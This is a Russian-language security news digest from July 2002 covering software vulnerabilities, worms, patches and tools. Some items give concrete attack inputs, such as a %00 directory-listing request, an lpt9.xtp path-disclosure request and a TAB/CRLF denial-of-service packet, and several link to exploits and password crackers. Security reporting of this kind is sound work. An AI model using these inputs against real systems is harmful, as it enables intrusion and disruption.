Речь в статье идет о структуре и возможности инфицирования кода MSIL. http://insafe.ru/articles/system/2/5.htm
19/07/2002 Появился анонс второго выпуска электронной газеты INOZ (In Name Of Zero).
В отличие от вышедшего 8 месяцев назад первого номера этот жестко ориентирован на разработку вирусов. Разделов, посвященных другим областям в анонсе нет.http://sbvc.host.sk/doxtxt/inoz2.htm
18/07/2002 Южнокорейские хакеры объявляют войну США.
Южнокорейские активисты объявили о начале военных действий в киберпространстве против правительства США. Причиной этого послужила смерть двух девочек-подростков в автомобильной аварии, происшедшей по вине военнослужащих США. По словам Ён Шу Куня, одного из организаторов акции, их цель - "на время вывести из строя серверы, чтобы показать наш гнев". Особое возмущение общественности вызвало первоначальное заявление военных США о том, что они не намерены судить двух своих сослуживцев, виновных в аварии. Корейские активисты требуют извинений от президента Буша и грозятся устроить атаки Denial of Service (DoS) на несколько ключевых правительственных интернет-сетей. Наиболее вероятные мишени: сайты Белого Дома и посольства США в Южной Корее. Источник - http://www.compulenta.ru/2002/7/18/32268/
18/07/2002 Уязвимость в Macromedia Sitespring.
Найдена уязвимость в Macromedia Sitespring v1.2.0(277.1) на Windows 2000 Server, суть уязвимости заключается в том, что стандартный скрипт выдачи 500 ошибки не проверяет параметры, в результате чего в url может присутствовать любой JavaScript. Подробнее - http://online.securityfocus.com/archive/1/282742
18/07/2002 В США хакерам будут давать пожизненный срок.
Палата представителей американского Конгресса одобрила законопроект, по которому компьютерные взломщики могут получить наказание в виде пожизненного тюремного заключения. Такой приговор может быть вынесен в случае, если в результате умышленных действий хакеров или из-за "безответственности" ставятся под угрозу жизни людей или наносится серьезный вред инфраструктуре страны. Источник - http://lenta.ru/internet/2002/07/17/lifeterm/
18/07/2002 Уязвимость в Вэб-сервере Resin.
В вэб-сервере Resin версий 2.1.1, 2.1.2 для Win2k обнаружена уязвимость, позволяющая узнать физический путь для директории $WEBROOT. Для того, чтобы получить полный путь к директории, достаточно сформировать запрос к определённым DOS-устройствам, например, к lpt9.xtp. При этом после текста об ошибке выводится полный физический путь в $WEBROOT-директории. Авторы Вэб-сервера http://www.caucho.com выпустили обновлённую версию 2.1.s020711 и рекомендуют всем обновиться. Источник - http://www.secutityfocus.com
18/07/2002 Symantec приобрел SecurityFocus.com aka Bugtraq.
Из заявления самого Symantec, он не собирается вносить каких-либо изменений в политику приобретенной им компании. Подробнее - http://lists.insecure.org/bugtraq/2002/Jul/0193.html Или здесь - http://online.securityfocus.com/archive/1/282903
18/07/2002 Проект "Sniffable Switch Project".
Большинство людей уверены, что сеть, построенная на базе свичей (коммутаторов) является безопасной, поскольку защищена от снифферов-программ, прослушивающих сетевой траффик. Подобного же мнения заставляют придерживаться администраторов и производители этого типа оборудования. Однако, всё это не совсем всегда верно. Присутствующие в Интернет программы (ettercap, dsniff) позволяют в большинстве случаев обойти свичи, применяя атаки типа: ARP spoofing, MAC flooding, MAC duplicating и подобные им. Alaric (alaric@alaricsecurity.com) анонсировал в BUGTRAQ новый проект под названием "Sniffable Switch Project", цель которого рассмотрение возможных уязвимостей для вышеприведённых атак свичей различных производителей и под управлением различных ОС. Пока автор собирает статистику, но обещал в течении ближайших 2-3 дней опубликовать её результаты. Сайт проекта - http://www.alaricsecurity.com/ssp.html
18/07/2002 Опасность! Новые варианты червя "Frethem" выходят на просторы Интернета! .
"Лаборатория Касперского" предупреждает о регистрации массовых случаев заражения новыми модификациями ("K", "L") Интернет-червя "Frethem". Для проникновения на компьютеры "Frethem" использует обнаруженную полтора года назад брешь в системе безопасности Internet Explorer (IFRAME-брешь). Из-за этого заражение системы происходит непосредственно в момент чтения инфицированного электронного письма. Вложенные файлы: decrypt-password.exe, password.txt После запуска файла-носителя червь регистрирует себя в секции автозапуска системного реестра Windows, сканирует файлы формата WAB (Windows Address Book) и DBX и рассылает по найденным в них адресам электронной почты свои копии. В дополнение "Frethem" устанавливает на компьютер утилиту скрытого удаленного администрирования, которая дает злоумышленникам возможность управлять системой и устанавливать новые версии самого червя. Более подробно о черве, а также о его лечении - http://www.viruslist.com/index.html?tnews=1001&id=473628
17/07/2002 Релиз долгожданного браузера Camera/Shy.
сDс(Cult of dead cow - авторы трояна Back Orifice) выпустили свой браузер - Camera/Shy, главная цель данного браузера позволить обмениваться сообщениями не в явной форме, а в виде графических файлов, что позволит обойти цензуру накладываемую на контент в различных странах. Кроме этого он может отключать все активные скрипты, чистить кэш и историю, удалять все изображения, которые не относятся к просматриваемому ресурсу. Подробнее - http://www.cultdeadcow.com/details.php3?listing_id=431 Загрузить - http://www.mirrors.wiretapped.net/security/steganography/camerashy/
17/07/2002 Новая версия Dr.Web 4.28.
В новой версии появилась поддержка WinRAR 3.0 и усовершенствована проверка почтовых файлов. Загрузить - http://drweb.spb.ru/download/drweb32.exe (Win32) Для других ОС - http://www.drweb.ru/get/
17/07/2002 Разработка защищенных программ.
Несколько месяцев назад Билл Гейтс объявил, что безопасность станет приоритетом номер 1 в Microsoft. Несколько групп в Microsoft, такие как Trusted Computing Group и Secure Windows Initiative стремятся улучшить безопасность в продуктах Microsoft, и, в конечном счете, улучшить ситуацию для людей и корпораций во всем мире. Если Microsoft, с ее миллиардными ресурсами и многочисленным штатом сотрудников, имеет проблемы с безопасностью, то как же решать проблему создания доверенных систем? Подробности - http://SecurityLab.ru/?ID=31936
17/07/2002 11 миллионов американцев будут шпионить на полицию и спецслужбы.
В рамках программы создания "системы информирования о терактах и их предупреждения" в США планируется набрать миллионы человек, которые станут шпионить на министерство юстиции, федеральные агентства безопасности и полицию. По меньшей мере четыре процента американцев из числа гражданского населения будут сообщать властям о "подозрительной деятельности". Программу начнут реализовывать в августе. На первом этапе в 10 городах будет работать миллион информаторов. Источник - http://lenta.ru/world/2002/07/15/spies/
17/07/2002 Уязвимость в ICQ.
С помощью данной уязвимости становится возможным выполнить любой программный код, замаскировав его под звуковую схему в ICQ. Експлоит - http://www.xs4all.nl/~jkuperus/icq/icq.htm Подробнее - http://online.securityfocus.com/archive/1/282631
17/07/2002 Новое интервью на www.kernetrap.com.
На днях Kerneltrap очередной раз порадовал своих посетителей новым интервью, на этот раз с Robert Love - одним из ведущих разработчиков ядра ОС Linux, автором знаменитого "preemption patch". Подробности - http://www.kerneltrap.com/node.php?id=336
16/07/2002 Выпущен патч для NetWare Netmail (NIMS) 3.0.3A.
Этот патч устраняет уязвимость в IMAP Agent, которая могла бы повлечь крах системы, если на IMAP Agent был бы отправлен специальный код.Этот патч рекомендуется для всех версий NetMail (NIMS) 3.0.x. Патч - http://support.novell.com/servlet/tidfinder/2962974
16/07/2002 Уязвимость в Norton Personal Internet Firewall HTTP Proxy.
Суть уязвимости заключается в посылки множественных данных на открытый порт, этим вызывая переполнение буфера и возможность исполнения программ на уровне ядра. Уязвимость была найдена только в Norton Personal Internet Firewall HTTP Proxy на Microsoft Windows NT4 SP6a и Microsoft Windows 2000 SP2. Подробнее - http://online.securityfocus.com/archive/1/282360 Патч - http://securityresponse.symantec.com/avcenter/security/SymantecAdvisories.html
16/07/2002 Интеграция Антивируса Касперского с почтовой системой.
Неплохая статья, которая описывает два метода установки Антивируса Касперского(KAV) на ваш почтовый сервер. Читать здесь - http://www.softerra.ru/freeos/18915/print.html
15/07/2002 Программа для взлома паролей в Microsoft SQL Server.
Взлом паролей основан на недавно найденных уязвимостях в Microsoft SQL Server. Данная программа может подбирать пароль по словарю или в режиме брутфорса. Скорость подбора 750 000 слов/сек. Подробнее - http://www.cqure.net/tools10.html
15/07/2002 Релиз DHGroup на SecurityFocus.com aka Bugtraq.
DHGroup решила акцентировать внимание на некоторых настройках программ: Eserv/2.97, WinApache, mIRC32 v6.* и XiRCON v.1.0 B4, неправильная настройка которых, может открыть лишнюю лазейку для злоумышленников. Подробнее - http://online.securityfocus.com/archive/1/282022
14/07/2002 Уязвимость в RealONE Player Gold.
Группа Shadow Penguin Security обнаружила уязвимость в RealONE Player Gold, а также в RealJukebox. Уязвимость состоит в возможности подмены скин-файлов. Подробности - http://service.real.com/help/faq/security/bufferoverrun07092002.html
13/07/2002 Вышла новая версия KDE 3.1 Alpha 1.
В новой версии исправлен ряд багов, а так же сделан ряд улучшений: была обнавлена система безопасности KMail, улучшен просмотр видеофайлов, стало возможным отображение рабочего стола на нескольких компьютерах и др. Подробнее - http://www.kde.org/announcements/announce-3.1alpha1.html Загрузить новую версию - http://www.kde.org/ftpmirrors.html
12/07/2002 Уязвимость в IIS Microsoft SMTP Service.
Найдена уязвимость в IIS 4.0/5.0 Microsoft SMTP Service, которая позволяет обойти запрет на отсылку писем только внутри заданного домена, что позволяет отсылать письма на адреса других доменов. Подробнее - http://online.securityfocus.com/archive/1/281914
12/07/2002 Очередная уязвимость в SQL Server 7 & 2000.
Уязвимость при инсталлировании SQL Server. Проблема со созданием временных файлов. Подробности - http://www.appsecinc.com/resources/alerts/mssql/02-0009.html
12/07/2002 Производители ОС с ToolTalk отвечают на удар.
В оответ на предыдущее сообщение о наличии ошибок, приводящих к уязвимости в ToolTalk крупнейшие производители ответили. Первым ответил CERT (что в общем то закономерно). И выпустил бюллетень. Основное требование запретить в /etc/inetd rpc.ttdbserverd. Подробности - http://www.kb.cert.org/vuls/id/975403
12/07/2002 Эксплоит уязвимости в IE.
Сосбственно, вот. Мэтью Мэрфи написал экплоит для использовоания "дырочки" в ИЕ. Эксплоит - http://www.murphy.101main.net/localread.htm
12/07/2002 FreeBSD SWAP.
Инересная дискуссия в FreeBSD -hackers mailing list по повод рационального использования SWAP. Ознакомиться - http://www.kerneltrap.com/node.php?id=323
12/07/2002 Обнаружена уязвимость в PGP для Outlook.
Компания eEye Digital Security обнаружила уязвимость в PGP-плагине для Microsoft Oulook в следующих продуктах: PGP Desktop Security 7.0.4, PGP Personal Security 7.0.3, PGP Freeware 7.0.3. Уязвимость заключается в том, что злоумышленник может сообщением со специальным кодом вызвать переполнение буфера, когда будет произведена попытка расшифровать сообщение, а далее сможет выполнить любой программный код. Патч - http://www.nai.com/naicommon/download/upgrade/patches/patch-pgphotfix.asp Подробнее - http://www.eeye.com/html/Research/Advisories/AD20020710.html
11/07/2002 Множественные уязвимость в сервере ToolTalk.
CORE SECURITY TECHNOLOGIES были обнаружены уязвимости в ToolTalk-cервере (rpc.ttdbserverd) - сервисе, предназначенном для взаимодействия различных приложений друг с другом посредством обмена ToolTalk-сообщениями. Процессы взаимодействуют друг с другом, посылая RPC-запросы через ToolTalk-сервер. Обнаруженные уязвимости посзволяют как удалённо, так и локально: удалять любые файлы на уязвимой системе, удалённо создавать директории и т.д. Список уязвимых систем довольно широк и включает в себя следующие ОС: Solaris, HP-UX, Tru64, Xi Graphics deXtop CDE, AIX, Caldera Open UNIX и Caldera UNIXware. Подробнее - http://www.corest.com
11/07/2002 Internet Explorer допускает междоменный скриптинг.
Thor Larholm-датский специалист по безопасности из PivX Solutions, обнаружил уязвимость в IE (а также в связанных с ним приложениях-Outlook, Outlook Express), которая позволяет администратору Вэб-cервера получить доступ к cookies клиента, а также выполнять произвольные команды и просматривать локальные файлы на машине клиента. Уязвимость связана с элементом HTML4 под названием OBJECT. Этот элемент предназначен для внедрения внешних объектов (элементы управления вэб-броузером и ActiveX, рисунки, апплеты) внутрь страницы Вэб-сервера. При этом свойство элемента OBJECT не проверяется на безопасность. В приведённом автором примере демонстрируется возможность чтения cookies клиента для домена http://www.passport.com. Из-за того, что не проверяется свойство WebBrowser controls на Cross Domain в внедренных HTML-документах, возникает возможность выхода из ограничений зоны безопасности. Уязвимость обнаружена в IE6 Win2K, IE5.5 Win98, IE5.5 WinNT 4 со всеми патчами и сервис-паками. В качестве защиты автор предлагает или отключить ActiveX, или установить "Script ActiveX controls marked safe for scripting". Подробности - http://www.PivX.com/larholm/adv/TL003/ Рекомендации по отключению ActiveX - http://www.PivX.com/tutorials/disable_activex.html Полный список уязвимостей IE(непропатченных на настоящий момент) - http://www.PivX.com/larholm/unpatched/
11/07/2002 Совокупная заплата для MS SQL Server 2000.
Совокупная заплата для SQL Server 2000 содержит все предыдущие патчи для SQL Server 2000 и устраняет три новые уязвимости, обнаруженные в SQL Server 2000 и MSDE 2000. 1.Переполнение буфера в процедуре pwdencrypt, используемой для шифрования опознавательных мандатов. Успешная эксплуатация этой уязвимости может приводить к выполнению произвольного кода с привилегиями процесса SQL сервера. 2.Переполнение буфера в процедуре, которая используется для вставки больших данных в таблицы SQL сервера.Успешная эксплуатация этой уязвимости может приводить к полному контролю над базой данных и возможно над сервером непосредственно. 3.Повышение привилегий, связанное с неправильными разрешениями в ключе реестра, в котором SQL сервер хранит информацию о сервисной учетной записи. Успешная эксплуатация позволяет атакующему получить административные привилегии на уязвимой системе. Microsoft оценила риск обнаруженных уязвимостей как "Moderate". Уязвимость обнаружена в SQL Server 2000. Подробности - http://SecurityLab.ru/?ID=31924 Патч - http://www.microsoft.com/technet/security/bulletin/ms02-034.asp
11/07/2002 Линукс на блинах.
Совсем недавно, был выпущен новый дистрибутив Линукса под названием BCS Linux (за основу был взят SlackWare). В последнее время появление новых дистрибутивов перестало удивлять кого-либо, но данный случай - особое исключение. Дело в том, что этот дистрибутив загружается в память сразу, без установки, с компакт диска. Причем это не обычная командная строка, а полноценная система с графической оболочкой и самыми необходимыми программами (приложения для интернета, офиса, графика и т.д.). Достаточно лишь скачать образ компакт диска, записать его и вставить в компьютер - сразу загружается система, включается графическая оболочка, настраивается звук и видео. Дополнительно можно включить интернет (через лок. сеть или модем), подключить флоппи диск и разделы с жестких дисков (есть возможность монтировать жесткие диски, но только в режиме read-only). Также, в систему встроена "качественная" поддержка кириллицы. Стоит отметить, что это не замена таким стандартным дистрибутивам как RedHat, Slackware, Mandrake и т.д., но эта система будет крайне полезна и незаменима в нескольких ситуациях, например: + Если пользователь желает попробывать и посмотреть Linux систему без какого-либо вреда для своей системы + Если есть желание показать, что такое Линукс своим друзьям без всяких установок + Иногда необходимо иметь под рукой систему, которая будет наименее безопасна на чужом компьютере - ведь используется только память и при выключении все данные вылетают, поэтому просмотреть, чем занимались на этой машине ранее будет невозможно + Некоторые продвинутые установят дополнительные пакеты снифферов (напр. EtterCap, EtheReal), и других сетевых инструментов, чтобы можно было использовать любой компьютер для своих "исследований" быстро и безбоязненно. И это не предел всех ситуаций когда такой дистрибутив будет необходим. Сайт разработчиков Blin Linux: http://www.linux.zp.ua Источник: http://linux.kiev.ua Заркала для загрузки ISO-образа Blin Linux: ftp://ftp.tlk-l.net/pub/mirrors/blin.zp.ua/blin-1.1.0-pre1.iso ftp://ftp.chg.ru/pub/Linux/BLin/blin-1.1.0-pre1.iso
10/07/2002 Интернет-червь Calil-червь, меняющий имя пользователя.
Лаборатория Касперского обнаружила новый червь под названием Calil. Распространяется через Интернет как вложение в инфицированных e-mail сообщениях. Отсылаемые червём сообщения имеют следующие свойства: Тема: FW:FW: LILAC project video attach Имя вложения: LILAC_WHAT_A_WONDERFULNAME.avi Размер вложения: 12208 байт. Текст сообщения: Things that the govt. dont want you to know После этого он пытается скопировать себя в одну из директорий $WINDIR/temp под именем LILAC_WHAT_A_WONDERFULNAME.avi.exe и прописывает себя в реестре в ключе автозапуска Run. Червь получает e-mail адреса из адресных книг Windows и Outlook, и отсылает по этим адресам заражённые сообщения. Для отсылки писем червь использует функции Outlook. Кроме этого меняет ключи реестра, меняя RegisteredOwner=xEnOcrAtEs. Более подробно - http://www.viruslist.com/index.html?tnews=1001&id=455317
10/07/2002 Бета-версию нового Norton Antivirus можно скачать бесплатно.
Корпорация Symantec выпускает бета-релиз новой версии своего антивирусного ПО для "открытого тестирования". Все желающие могут скачать пакет. Правда, следует иметь в виду, что скачивать придется 35 мегабайт. В готовящемся к выпуску Norton Antivirus 2003, как сообщают в Symantec, появится множество новых функций, и поскольку "софта без дыр не бывает", разработчики заинтересованны в том, чтобы сторонние энтузиасты протестировали работу пакета. Первые пятьдесят человек, обнаружившие неисправности и сообщившие о них в Symantec, после окончательного выхода антивирусного пакета, получат по бесплатной копии. Скачать - http://www.symantec.com/public_beta/#nav
10/07/2002 DoS в Watchguard Firebox.
Watchguard Firebox - это мощный программный продукт, обеспечивающий безопасность предприятий среднего и малого бизнеса, обеспечивающий программный файрволл с поддержкой сетей VPN. Удалённый пользователь может провести атаку типа DoS, послав по адресу службы DVCP (Dynamic VPN Configuration Protocol) - порт TCP/4110 cпециально сформированный пакет. Как пишут авторы уязвимости (датская группа KPMG), достаточно посылки от 1 до 400 пакетов, состоящих из символов TAB и CRLF. Уязвимость была обнаружена в версии Watchguard Firebox firmware v5.x.x. ПРоизводитель выпустил новую версию - v6.0.b1140, в которой этой уязвимости нет. Подробности - http://www.security.nnov.ru/search/document.asp?docid=3186
10/07/2002 Уязвимость в iPlanet Web Server.
Специалисты из NGSSoftware обнаружили уязвимость в коммерческом Вэб-сервере iPlanet, который выпускается и поддерживается фирмой Sun Microsystems. Уязвимость присутствует в компоненте поиска, отключённом по умолчанию. Задав очень длинное значение параметра 'NS-rel-doc-name', можно удалённо получить переполнение буфера с перезаписью адреса возврата в стеке. При этом возникает возможность выполнения произвольного кода в контексте безопасности эккаунта, от имени которого запущен Вэб-сервер. Применительно к Win2K таким эккаунтом является SYSTEM. Таким образом возникает опасность полной компрометации системы. Уязвимость присутствует в версиях iPlanet's Web Server 4.1-6.0. Фирма Sun выпустила патчи. Для версии 4.1 рекомендуется применить Service Pack 10, для версии 6 - Service Pack 3. Подробности - http://www.ngssoftware.com/advisories/sun-iws.txt
9/07/2002 Обнаружен новый сетевой червь - Worm.Win32.Datom .
Лаборатория Касперского сообщает об обнаружении нового сетевого червя. Распространяется через доступные сетевые ресурсы. Состоит из 3 разных компонентов: MSVXD.EXE, MSVXD16.DLL, MSVXD32.DLL. Первый компонент, MSVXD.EXE, активизирует червь при запуске, загружая библиотеку MSVXD16.DLL. В свою очередь, MSVXD16.DLL загружает компонент MSVXD32.DLL, который выполняет основные функции размножения. Червь ищет доступные сетевые ресурсы и пытается соединиться с компьютерами, на котором находятся эти ресурсы. В случае успешного соединения, червь ищет доступную папку, которая может быть директорией Windows. Для этого он пытается использовать имя "WinNT", а также читает раздел "WinDir" из файла MSDOS.SYS, если такой существует и доступен. Затем червь копирует в удалённую директорию Windows все свои компоненты, и настраивает автозагрузку файла MSVXD.EXE при старте Windows: если в удалённой директории Windows существует файл "Win.ini", в его секцию "Run" записывается строка "MSVXD.exe", в противном случае червь создаёт файл-ярлык "VxD Manager.lnk", указывающий на MSVXD.exe, в общей для всех пользователей папке автозагрузки на удалённом компьютере. Червь ищет и пытается закрыть запущенные копии брандмауэра ZoneAlarm, а также отсылает по электронной почте письма-"уведомления" по одному из двух адресов, возможно, принадлежащих автору червя. Эти письма содержат информацию о заражённой системе. Источник - http://www.viruslist.com/viruslist.html?id=452247
9/07/2002 Microsoft задерживает Service Pack 3 для Win 2000 из-за ошибок.
Microsoft отложила на неопределенный срок выпуск Windows 2000-Service Pack 3. Это связано с обнаружением нескольких серьезных ошибок в коде Microsoft Installer (MSI) 2.0. Предварительно заявлялось, что Service Pack 3 выйдет 17 июля, однако из-за обнаруженных ошибок Microsoft была вынуждена включить в сервис-пак предыдущую версию MSI 1.1 для бета-тестеров. Источник - http://www.wininformant.com/Articles/Index.cfm?ArticleID=25802
9/07/2002 Cтатья "Rescuing Linux Systems-Generic and Distribution-Specific Safety Nets".
Иногда при работе серверов под управлением Linux возникает ситуация, когда система перестаёт загружаться. И если проблемы "железа" решить просто, то проблемы целостности файловой системы и разделов диска решить бывает довольно трудно. При невозможности загрузки обычно используются "rescue"-дискеты и CD-ROM (правильный перевод будет, скорее всего, "аварийные"), которые позволяют загрузиться с внешнего носителя и при помощи различных утилит попытаться восстановить файловую систему. Статья Билла вон Хагена на linuxplanet посвящена созданию и использованию "rescue" дискет. Рассматриваются различные виды "rescue"-дискет: независимые и специфические для каждого дистрибутива. Рассматриваются методы и способы восстановления системы в различных дистрибутивах Linux. Также рассматриваются инструметы (программы), позволяющие облегчить создание аварийных дискет. Рекомендуется к прочтению как системными администраторами начального уровня, так и пользователям десктоповых вариантов Linux. Cтатья - http://www.linuxplanet.com/linuxplanet/reports/4294/1/
9/07/2002 Уязвимость в MyWebServer.
В Вэб-сервере MyWebServer версий 1.02 и ниже Robin Keir из Foundstone Inc. обнаружил уязвимость типа переполнения буфера, эксплуатация которой позволяет выполнить на сервере произвольный код с привилегиями пользователя, от имени которого запускается Вэб-сервер. Переполнение буфера происходит при формировании GET-запроса, в поле URL которого более 1000 символов. Подробности - http://www.foundstone.com/advisories.htm
9/07/2002 Уязвимость в KF Web Server.
KF Web Server - маленький, не требовательный к ресурсам, легко администрируемый персональный Вэб-сервер, выпускаемый KeyFocus. Arnaud Jacques aka scrap из securiteinfo обнаружил уязвимость, которая позволяет просмотреть содержимой директорий сервера и его файлов при вводе после имени директории символа %00. Таким образом, запрос вида http://server_name/subdir/%00 покажет содержимое директории subdir. Уязвимости повержена версия 1.0.2 для ОС Win98,ME,2000,XP. KeyFocus выпустила новую весрию KFWS - 1.0.3. Источник - http://www.securiteinfo.com
9/07/2002 Cтатья "Cracking SQL Server passwords".
David Litchfield из NGSSoftware Ltd опубликовал статью, задача которой-рассказать, каким образом SQL-сервер хранит свои пароли и хэши. Хэши обычно могут применяться 2-х видов: чувствительные к регистру букв и хэши, в которых применяются только заглавные буквы. Статья также содержит исходник демо-версии программы, которая взламывает пароли SQL на основе словаря. В настоящее время NGSSoftware Ltd работает над оптимизированной GUI версией программы. Статья в формате PDF - http://www.nextgenss.com/papers/cracking-sql-passwords.pdf
9/07/2002 Linux: что раньше: 2.6 или 2.7?.
Начало рабочей недели породило жаркие дискуссии в LKML по поводу организации релизов веток ядра 2.6 и 2.7. Ознакомиться - http://www.kerneltrap.com/node.php?id=317
8/07/2002 Проект Reverse Challenge завершён, победители названы.
Конкурс Reverse Challenge, объявленный экспертной группой по компьютерной безопасности Honeynet Project, завершился. В этом году серверы Honeynet Project попытались взломать, и программа, которая использовалась для этого, попалась в "ловушку" (Honeypot) на сервере. Всем участникам соревнования Reverse Challenge предлагалось произвести "вскрытие" этой программы, провести ее всесторонний анализ и написать подробную документацию. Сегодня на сайте проекта выложен список 20 победителей этого соревнования. Там же располагается написанная ими документация. Как явствует из отчета Дайона Мендела (Dion Mendel), специалиста, занявшего первое место, эта вредоносная программа представляет собой инструмент для проведения удаленных распределённых DoS-атак (DDoS), напоминающий программы Trinoo и TFN (инструменты для проведения DDoS-в эту же группу может быть причислен также Stacheldraht), которыми хакеры пользовались для взлома ряда крупнейших порталов в интернете, например, Yahoo и eBay. По мнению Мендела, небольшая подстройка корпоративного брандмауэра низведет опасность пойманной Honeynet программы до минимального уровня. Пойманная программа располагается на сайте Honeynet в открытом доступе. Подробности - http://project.honeynet.org/reverse
8/07/2002 Хакеры секты "Фалуньгун" взломали спутник.
Как стало известно, хакеры-приверженцы запрещенного в Китае движения "Фалуньгун" атаковали китайский телевизионный спутник, и в результате, по всем телеканалам Поднебесной несколько раз прошла реклама "Фалуньгуна". Как сообщает издание Australian IT, взлому подверглись не только телевизионные спутники Sinosat-1, через которые идет трансляция многих каналов китайского ТВ, но и телефонная сеть в Пекине. В каждом доме раздавались звонки, и снимавшие трубку слышали пятиминутную аудиозапись, на которой последователи "Фалуньгуна" по пунктам громили аргументы запретивших их движение китайских властей. По телевидению же несколько минут демонстрировался плакат "Фалуньгун - это хорошо". Источник - http://australianit.news.com.au
8/07/2002 Червь Scalper использует бреши в популярном web сервере "Apache".
Червь, о котором мы сообщали ранее в новостях получил название Scalper. Вот как его характеризует Лаборатория Касперского. В сети появился интренет-червь Scalper (AKA "FreeBSD.Scalper.worm", "ELF/FreeApworm", "ELF_SCALPER.A"), который поражает серверы под управлением операционной системы FreeBSD. Scalper использует бреши в системе безопасности популярного web сервера "Apache". Червь также содержит backdoor компоненту, которая позволяет управлять зараженным сервером. Эта компонента принимает команды запуска файлов на локальном компьютере, наводнение запросами некоторого IP адреса, посылка электронной почты и т.п. Backdoor активируется на порту 2001/UDP и обрабатывает широкий спектр команд. Все запросы для backdoor компоненты зашифрованы, но шифровка постоянна и скорее всего используется для защиты от анализаторов интернет-трафика. Подробности - http://www.viruslist.com/index.html?tnews=1003&id=439849
8/07/2002 Уязвимость в MacOS X SoftwareUpdate.
В версиях ОС MacOS 10.1.X и 10.0.X (производитель - фирма Apple) обнаружена уязвимость, которая может позволить злоумышленнику внедрить свой код (троян, руткит, например) в систему. Mac OS X включает механизм "SoftwareUpdate", который позволяет периодически обновлять программное обеспечения для Mac c cайта фирмы Apple. При этом используется протокол HTTP без какой-либо аутентификации. Таким образом, злоумышленник, применяя технику DNS Spoofing или DNS Cache Poisoning, может обмануть пользователя системы и заставить его вместо "легальной" программы загрузить свой код под видом обновления от Apple. Необходимо отметить, что обновление ПО обычно выполняется от имени пользователя root - последствия очевидны. Автор (Russell Harding) выпустил эксплоит, который представляет собой пакет для Mac OS X. Включает в себя: ПО для ARP/DNS-спуффинга, cgi-скрипты и конфигурационные файлы Вэб-сервера Apache, требуемые для имперсонификации Apple SoftwareUpdatesServer Описание и исходники эксплоита - http://www.cunap.com/~hardingr/projects/osx/exploit.html
8/07/2002 Семинар SoftLine "Решения Symantec для защиты корпоративных сетей".
SoftLine совместно с московским представительством компании Symantec проводит семинар "Решения Symantec для защиты корпоративных сетей". Семинар состоится 16 июля 2002 г. в 9.00 в Конференц-зале Математического института им. В.А. Стеклова. Семинар проводится бесплатно. Для участия в семинаре необходимо обязательно зарегистрироваться. Регистрация - http://www.softline.ru/seminar.asp?... Cхема проезда - http://www.softline.ru/seminar.asp?...
7/07/2002 Mandrake Linux Security Advisory: обновление ядра, версии 2.2 и 2.4.
Была обнаружена уязвимость в следующих версиях Mandrake Linux: 7.1, 7.2, 8.0, 8.1, 8.2, Corporate Server 1.0.1, Single Network Firewall 7.2. Специально сформированный пакет может "повесить" систему, из-за неправильной реализации работы ICMP протокола. Подробности: http://www.mandrakesecure.net/en/advisories/
7/07/2002 NetFW - персональный брандмауэр.
В сети редко можно встретить бесплатный брандмауэр(firewall). NetFW является одним из этих редких продуктов, более того, он еще и поставляется с исходниками. Оригинальное описание фаерволла: ОС-Win98, фильтрация TCP/IP трафика с помощью виртуального драйвера, перехватывающего функции системного драйвера ndis.vxd. Драйвер написан на C (ndishook.c), интерфейсная часть - на Delphi3. Кроме исполняемых файлов, дистрибутив включает в себя исходники и файл помощи. Исходный код содержит подробнейшие комментарии на русском языке (как в драйвере, так и в интерфейсной части). Скачать дистрибутив (1.01 Мб): http://www.insafe.ru/release/bin/netfw0.2.zip Скачать только исходники (231 Кб): http://www.insafe.ru/release/source/NetFWsource.zip
7/07/2002 Вирусная двадцатка за июнь.
"Лаборатория Касперского" публикует очередной выпуск своего ежемесячного рейтинга "Вирусная двадцатка". В нынешнем выпуске наблюдаются несколько сюрпризов, хотя особо значительными их не назовешь. Во-первых, впервые разные представители семейства Klez выставлены отдельно. Klez.h и Klez.e заняли первое и третье место соответственно. На второе место вырвался Lentin.g, так же известный как Yaha (с его помощью индийские хакеры пытались разделаться с сайтом пакистанского правительства). Вирус Lentin.e расположился на четвертом месте. Источник - http://www.compulenta.ru
6/07/2002 Стремительный рост числа уязвимостей WEB приложений.
По данным сервера статистики www.netcraft.com, последние дни оказались, как никогда ранее, наполнены новыми уязвимостями в WEB приложениях. По предварительным подсчетам, на текущий момент более 14`000`000 серверов по всему миру имеют проблемы в области безопасности. Подробности - http://www.theregister.co.uk/content/55/26049.html
6/07/2002 В WinAMP 2.x была обнаружена уязвимость, которая позволяет произвести удаленную DoS атаку.
Загрузить exploit: http://online.securityfocus.com/attachment/2002-07-06/wapatch.zip Подробная информация: http://online.securityfocus.com/archive/1/280786
6/07/2002 Один из крупнейших московских операторов сотовой связи - МТС, ночью с 3 на 4 июля перенес сбой, в то время, когда технические службы начали замену основного сервера БД систем расчетов компании, который понадобился в связи с увеличением числа клиентов.
В результате этого сбоя больше всех пострадал сервис приема платежей, его функции производились в ручную.Источник: http://www.mts.ru
6/07/2002 EtterCap 0.6.7.
Вышла новая версия самого лучшего сниффера для сетей построенных с помощью коммутаторов. Программа имеет графический интерфейс (используя ncurses), а также множество полезных настроек и фильтры для получения паролей передаваемых по разным протоколам (POP3, HTTP и т.д.) Скачать новую версию можно здесь: http://ettercap.sourceforge.net/index.php?s=download
6/07/2002 Mandrake не будет участвовать в проекте UnitedLinux.
Французская компания MandrakeSoft заявила, что не собирается принимать участие в проекте UnitedLinux, участники которого планируют разработку универсального дистрибутива на базе открытой операционной системы. В своем заявлении MandrakeSoft оспорила утверждение о "фрагментации" Linux и необходимости внедрения единого стандарта для дистрибутивов на базе открытой ОС. По данным www.compulenta.ru
5/07/2002 UnBodyGuard a.k.a Bouncer.
noir из olympus.org написал небольшую программку под названием UnBodyGuard (Bouncer), цель которой - обходить написанный Dave Aitel загружаемый модуль ядра (LKM) для проверки целостностности ядра и "бэкдоров" с названием BodyGuard. Обе программы написаны для операционной системы Solaris. Архив содержит как бинарник, так и исходник. Исходник компилируется в Sun Workshop. Бинарник для Solaris 7,8 платформы-sun4u с 64-битным ядром. Может представлять интерес для разработчиков LKM и программ для обнаружения LKM Bouncer - http://gsu.linux.org.tr/~noir/b.tar.gz
5/07/2002 Уязвимость в nn.
nn - консольный клиент UNIX (ньюс-ридер) для чтения новостей службы NNTP. Группой safemode.org обнаружена удалённая уязвимость типа уязвимости форматной строки. Используя эту уязвимость владелец удалённого ньюс-сервера может выполнить критичный код на машине жертвы. На сайте производителя nn (http://www.nndev.org/) была выпущена новая версия 6.6.4. Необходимо также отметить, что для FreBSD обновлённая версия была выпущена в портах ещё 18 июня. Подробности - http://www.safemode.org/files/zillion/advisories/safemode-adv-nn.txt
